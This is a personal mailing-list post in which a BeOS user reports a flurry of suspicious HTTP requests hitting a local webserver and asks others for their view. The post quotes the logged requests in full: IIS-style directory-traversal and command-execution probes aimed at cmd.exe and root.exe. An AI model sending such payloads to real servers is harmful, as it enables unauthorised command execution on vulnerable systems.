Ok, this was rather interesting. It happened just about fifteen minutes ago (as I'm writing this). I'm online (PPP dialup) and am also running a local webserver (i.e. sending requests to loopback address 127.0.0.1). Yeah, that's asking for trouble, at least theoretically. That is, someone on the internet, if they happened to get a hold of my (temporary, dynamically assigned) IP, could send requests for local files and have them sent back out across the network. I've never had anything weird happen before, so I've always been pretty blase about the security risk. Anyway, I'm just testing some news items locally before copying them over to the OpenBeOS website (which is my usual MO). Suddenly, I notice the Terminal window (largely covered by another window, but partially showing) has a flurry of text flying by and the DUN replicant in the Deskbar shows lots of bytes transmitting back and forth. Wtf? So I uncover the Terminal window (which is running the webserver) and see that a number of unusual requests have just been attended to. Here's the first one: GET /scripts/root.exe?/c+dir HTTP/1.0 Host: www Connnection: close The remaining requests all look like that but with different URLs. Here are the other URLs that were requested: GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ dir HTTP/1.0 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 To me, that looks all the world like some hacker trying to grab files from my local machine. Could there be another explanation? Of course, I'm running BeOS (and don't have NT) so my local webserver just returned a bunch of 404 (Not found) responses. Still, makes you wonder. Has anyone else on this list had any similar experiences? What do you make of this?